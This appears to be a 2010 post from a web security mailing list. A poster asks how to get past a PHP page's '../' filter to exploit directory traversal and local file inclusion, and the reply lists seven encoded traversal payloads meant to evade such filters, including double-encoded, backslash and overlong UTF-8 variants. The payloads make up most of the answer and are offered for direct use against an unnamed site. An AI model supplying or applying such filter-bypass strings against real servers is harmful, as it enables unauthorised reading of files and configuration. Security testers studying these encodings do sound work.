[WEB SECURITY] ../ filtered
Shlomi Narkolayev
shlominar at gmail.com
Tue Feb 16 01:41:16 EST 2010
Try these:
..%5c..%5cFILENAME
%2e%2e\%2e%2e\FILENAME
..%c0%af..%c0%afFILENAME
..%255c..%255cFILENAME
%252e%252e/FILENAME
..%2f..%2fFILENAME
..%252f..%252fFILENAME
Soon I'll upload to my blog <http://narkolayev-shlomi.blogspot.com/> new
1400 variants for directory traversal.
Kind Regards,
Narkolayev Shlomi.
*From:** Beatriz Duran [mailto:beatrizdrn at yahoo.com]
Sent: Monday, February 15, 2010 9:43 AM
To: websecurity at webappsec.org
Subject: [WEB SECURITY] ../ filtered*
Hi, I need to find a vulnerability in a url that could be exploited for
directory traversal and LFI; the page is working with PHP but it is
filtering /../ and also /%2e%2e/, because the pace is using ISO for Latin
characters I can't use unicode extended because it reinterpret with other
values; is there another way to work around the filter?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20100216/69e178b8/attachment.html>
More information about the websecurity
mailing list